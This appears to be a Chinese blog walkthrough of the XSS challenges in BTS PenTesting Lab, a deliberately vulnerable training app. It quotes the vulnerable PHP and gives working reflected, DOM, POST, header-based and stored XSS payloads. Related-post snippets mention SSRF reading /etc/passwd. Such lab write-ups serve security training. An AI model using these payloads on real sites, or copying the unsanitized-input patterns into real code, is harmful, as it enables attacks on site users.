BTS PenTesting Lab - A3 XSS

最新推荐文章于 2021-05-28 13:24:12 发布
最新推荐文章于 2021-05-28 13:24:12 发布
阅读量1.5k 收藏
点赞数
分类专栏: 漏洞演练系统 文章标签: btslab 漏洞演练
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/zrools/article/details/50407550
版权

Reflected(GET)

Challenge 1
  • 源文件://btslab/vulnerability/xss/xss1.php

这里写图片描述

# 第8行
<?php if(isset($_GET['keyword'])) echo "No results found for ".$_GET['keyword']?>

直接echo提交过来的内容,提交<script>alert('xss');</script>

这里写图片描述

地址

http://192.168.1.228/vulnerability/xss/xss1.php?keyword=%3Cscript%3Ealert%28%27xxs%27%29%3B%3C%2Fscript%3E&Search=Search
Challenge 2
  • 源文件://btslab/vulnerability/xss/xss2.php

这里写图片描述

# 第5行
<form action="xss2.php" method="get" style="background-color:<?php if(isset($_GET['clr'])) echo $_GET['clr']?>">

直接echo提交过来的内容,先让style双引号闭合,然构造form标签属性触发事件即可,比如鼠标经过、离开事件等,构造red” οnmοuseenter=”alert(‘xss’)提交

这里写图片描述

地址

http://192.168.1.228/vulnerability/xss/xss2.php?clr=red%22%20onmouseenter=%22alert%28%27xss%27%29&Change=Change

还有后面还有一句

<?php if(isset($_GET['keyword'])) echo "No results found for ".$_GET['keyword']?>

构造&keyword=<script>alert('xss');</script>即可

Challenge 3
  • 源文件://btslab/vulnerability/xss/xss3.php

这里写图片描述

鼠标经过有提示

这里写图片描述

# 第2行
<?php if($_GET['t']) echo $_GET['t']; else echo 'title';?>

直接闭合title属性,加入a标签属性触发js即可,构造1” οnclick=”javascript:alert(‘xss’);提交,点击链接触发

这里写图片描述

地址

192.168.1.228/vulnerability/xss/xss3.php?t=1" onclick="javascript:alert('xss');
Challenge 4
  • 源文件://btslab/vulnerability/xss/xss4.php

这里写图片描述

# 第10行
<input type="text" name="keyword" value=<?php if($_GET['keyword']) echo htmlspecialchars($_GET['keyword']); else echo 'Search';?> >

htmlspecialchars默认配置不编码单引号,设置了quotestyle选项为ENT_QUOTES才会编码单引号,构造red onmouseenter=alert('xss')提交,鼠标经过触发

这里写图片描述

地址

http://192.168.1.228/vulnerability/xss/xss4.php?keyword=red+onmouseenter%3Dalert%28%27xss%27%29&Search=Search

POST Based

  • 源文件://btslab/vulnerability/xss/postxss.php

这里写图片描述

# 第13行
echo "Hello ".$_POST['name'].", Welcome to BTS Lab";

提交再输出,这样需要构造个表单,把文件扔到其他地方的网站,让用户访问自动post过来触发

<form action="http://192.168.1.228/vulnerability/xss/postxss.php" method="post" name="xss">
    <input type=text name=name value="<script>alert('xss');</script>"></input>
    <input type="submit" value="submit" />
</form>

<script>
    document.xss.submit();
</script>

这里写图片描述

DOM Based

  • 源文件:/btslab/vulnerability/xss/dom.php

这里写图片描述

# 第21-22行
var loc=location.hash.slice(1);
eval(loc);

在firefox下取出来的loc会被编码,所有需处理,提交

dom.php#alert(String.fromCharCode(120,115,115))

这里写图片描述

HTTP Referer

Challenge 1
  • 源文件:/btslab/vulnerability/xss/xss-referer.php (这里连接和下一题重复,在header.php把后面的2去掉)

这里写图片描述

在chrome和firefox中,query会被URL编码,IE不会,只要跳转即可

<a href="http://192.168.1.228/vulnerability/xss/xss-referer.php">xss</a>

构造连接后加上参数?<script>alert('xss');</script>

http://192.168.1.228/xss.html?<script>alert('xss');</script>

用IE跳转效果

这里写图片描述

Challenge 2
  • 源文件:/btslab/vulnerability/xss/xss-referer2.php

这里写图片描述

用strpos在 SERVER[HTTPREFERER] _SERVER [‘HTTP_HOST’]看来源是否一致

<a href="http://192.168.1.228/vulnerability/xss/xss-referer2.php">xss</a>
http://192.168.1.228/xss.html?<script>alert('xss');</script>

User Agent Header

  • 源文件:/btslab/vulnerability/xss/xss-user-agent.php

这里写图片描述

利用场景:有些CMS后台可以显示用户信息,比如浏览器版本等从HTTP_USER_AGENT中提取,如未经过滤就可以盲打管理员,HTTP_REFERER也类似

模拟以一下修改USER-AGENT的效果

这里写图片描述

Flash Based

Challenge 1
  • 源文件:/btslab/vulnerability/xss/flash/xss1.swf

地址

http://192.168.1.228/vulnerability/xss/flash/xss1.swf?vuln=

反编译xss1.swf

这里写图片描述

由于flash版本问题,问题大概出在这,自行测试

Challenge 2
  • 源文件:/btslab/vulnerability/xss/flash/exss.php

这里写图片描述

反编译xss2.swf
这里写图片描述

由于flash版本问题,问题大概出在这,自行测试

Stored XSS(Persistent)

  • 源文件:/btslab/vulnerability/forum.php

关键代码:

这里写图片描述

# 第34-46行

 34 if(isset($_POST['post']))
 35     {
 36     $content=$_POST['content'];
 37     $title=$_POST['title'];
 38     if(isset($_SESSION['isLoggedIn']))
 39     {
 40         $user=$_SESSION['username'];
 41     }
 42     else
 43     {
 44         $user="Anonymous";
 45     }
 46     mysql_query("INSERT into posts(content,title,user) values ('$content','$title','$user')") or die("Failed to post ".mysql_error());
 47     }

title、content均没处理就带到了数据库

  • 源文件:/btslab/vulnerability/ForumPosts.php

这里写图片描述

去出数据的时候也未进行处理,内容提交

</script>alert(\'xss\');</script>

点击列表访问

这里写图片描述

BTS PenTesting Lab - A1 Injection
zrools的博客
12-25 1192
SQL InjectionSql Injection 1 源文件:/btslab/vulnerability/ForumPosts.php # 第7行 mysql_query("DELETE from posts where postid='$id'") or die("Failed to Delete the post");# 第14行 $result=mysql_query("select *
BTS Pentesting Lab:BTS Pentesting Lab-一个故意易受攻击的Web应用程序-开源
05-27
BTS PenTesting Lab是一个开放源代码的易受攻击的Web应用程序,由网络安全和隐私基金会(www.cysecurity.org)创建。 它可用于了解许多不同类型的Web应用程序漏洞。 当前,该应用包含以下类型的漏洞:* SQL注入* XSS(包括基于Flash的xss)* CSRF *点击劫持* SSRF *文件包含*代码执行*不安全的直接对象引用*不受限制的文件上传漏洞*打开URL重定向*服务器Side Includes(SSI)注入和更多...此应用程序的Java版本可在此处找到:https://sourceforge.net/p/javavulnerablelab/
BTS PenTesting Lab - A10 Unvalidated Redirect & Forward..
zrools的博客
12-29 710
Open Redirect 源文件:/vulnerability/url/open.php http://192.168.1.228/vulnerability/url/open.php?u=http://www.breakthesecurity.com修改u参数就可以任意跳转,可用于钓鱼等Open Forward 源文件:/vulnerability/url/forward.php 修改u参数就可
BTS PenTesting Lab - Installation
zrools的博客
12-24 1141
漏洞类型 SQL Injection XSS(includes Flash Based xss) CSRF Clickjacking SSRF File Inclusion Code Execution Insecure Direct Object Reference Unrestricted File Upload vulnerability Open URL Redirection Server
BTS PenTesting Lab - More..
zrools的博客
12-29 897
SSRF Server-side Request Forgery源文件:/vulnerability/ssrf/ssrf.php 通过curl可获取图片,下载文件,读取文件内容等,尝试读取/etc/passwdClickjacking 源文件:/vulnerability/clickjacking/cj.php 源码就是删除自己账户,利用视觉欺骗手段,让用户在不知情的情况下,点击攻击者欺骗的位置
BTS PenTesting Lab - A4 Insecure Direct Object References
zrools的博客
12-28 1052
不安全的直接对象引用 Viewing Details 源文件:/btslab/myprofile.php 关键代码地址http://192.168.1.228/myprofile.php?id=1 (需要先登录)像id=1这种容易猜测,如果没有判断权限,就容易出现信息泄露的问题,查询代码从头到尾都没有进行权限判断,只要任意登录用户都可以查询Modifying email ID 源文件:/btslab
Java Vulnerable Lab - Pentesting Lab:故意易受攻击的 Web 应用程序-开源
05-30
这是由网络安全和隐私基金会 (www.cysecurity.org) 为 Java 程序员开发的易受攻击的 Web 应用程序有关 Hacking and Securing Web Java Programs 的完整课程可在 ...
NetSlaughter Pentesting Tool-开源
05-06
NetSlaughter是Nmap,Netcat,dsniff和tcpdump的GUI。 在Linux上运行,并用Java编码。 在接下来的修订中,我想使其成为多平台的,以便在Linux和Windows下运行
public-pentesting-reports-master.rar
05-27
经典渗透测测试报告大全,干了几年渗透测试,都是土路子,学习学习让自己更专业。
xssmap:基于phantomjs和go的(DOM-)XSS fuzzer
07-06
xssmap 是一个使用基于 webkit (PhantomJS) 的无头浏览器扫描 (DOM)XSS 漏洞的小工具。 这可以评估攻击向量并且几乎没有误报。 要求 安装 安装 phantomjs 命令行工具。 go get github.com/rverton/xssmap xssmap -...
BTS渗透测试实验室----安装与实战
fendo
03-02 2939
一、简介 BTS渗透测试实验室是一个开放源码的脆弱的Web应用程序,创建的网络安全和隐私的基础(www.cysecurity.org)。它可以用来了解许多不同类型的Web应用程序漏洞。 目前,该应用程序包含以下类型的漏洞: ● SQL注入 ● XSS(包括Flash XSS) ● CSRF ● 点击劫持 ● SSRF ● 文件包含 ● 执行代码 ● 不安
btslab渗透测试实验室
03-02
这是对"btslab渗透测试实验室"的一个汉化版,github地址为:https://github.com/CSPF-Founder/btslab BTS渗透测试实验室是一个开放源码的脆弱的Web应用程序,创建的网络安全和隐私的基础。它可以用来了解许多不同类型的Web应用程序漏洞。 目前,该应用程序包含以下类型的漏洞: SQL注入 XSS(包括Flash XSS) CSRF 点击劫持 SSRF 文件包含 执行代码 不安全的直接对象引用 不受限制的文件上传漏洞 打开URL重定向 服务器端包含(SSI) 注入
渗透测试平台
08-28
一款渗透测试实战平台。
BTS PenTesting Lab - A7 Missing Function Level Access Control
zrools的博客
12-29 1133
功能级权限控制缺失源文件:/admin/adminlogin.php 关键代码# 第16行 $result=mysql_query("select * from users where username='$username' and password='$password' and privilege='admin' ") or die(mysql_error());;username与passw
BTS PenTesting Lab - A8 CSRF
zrools的博客
12-29 715
CSRF 1: Change Info 源文件:/vulnerability/csrf/changeinfo.php 由于是get请求,可以使用img等标签自动加载<img src="http://192.168.1.228/vulnerability/csrf/changeinfo.php?info=CSRF_TEST!&change=Change" /> 打开效果CSRF 2: Change E
搭建学习环境(十三)——BTS PenTesting Lab安装及通关记录
baynk的博客
05-28 1246
好久没玩综合靶场了,其实没啥欲望,挺没意思的,不过由于某些特殊原因,还是慢慢更,争取把所有的这种综合靶场都复现一遍。 安装方式还是和原来基本一样,放到lamp或者wamp环境里面,改个数据库配置文件就可以了,配置文件为config.php。 官方下载地址不记得了,就放一个自己云盘的,下载地址:提取码: 2vyi ...
BTS测试实验室 --- xss攻略
wkend的博客
11-02 852
ox00反射型 挑战1 payload:&amp;amp;lt;script&amp;amp;gt;alert('xss')&amp;amp;lt;/script&amp;amp;gt; 挑战2 通过尝试发现页面会发生变化,而且参数在url中可见且可控 url:http://127.0.0.1/btslab/vulnerability/xss/xss2.php?clr=%23000&amp;amp;amp;Change=%E5%88%87%E6%8D%A2 改变参数
btslab全攻略——搭建安装和sql注入
小慌慌的博客
11-14 1602
一、介绍 直接引用官方说明 BTS PenTesting Lab is an open source vulnerable web application, created by Cyber Security & Privacy Foundation (www.cysecurity.org). It can be used to learn about many different types of web application vulnerabilities. Currently, th
btslab全攻略——sql注入
小慌慌的博客
12-09 299
sql注入 百度百科--sql注入: sql注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执 行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。 根据相关技术原理,SQL注入可以分为平台层注入和代码层注入。前者由不安全的数据库配置或数据库平台的漏洞所 致;后者主要是由于程序员对输入未进行细致地过滤,从而执行了非法的数据查询。 要了解sql语句以及php对数据库的操作,...
发现潜在DOM XSS漏洞的快速扫描工具
7. 相关标签含义:在该工具的标签中,"xss"、"pentesting"、"bugbounty"、"pentest"、"xss-scanner"和"bugbountytips"等,分别代表了XSS漏洞、渗透测试、漏洞赏金计划、漏洞扫描、以及提供给赏金猎人的一些小技巧。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值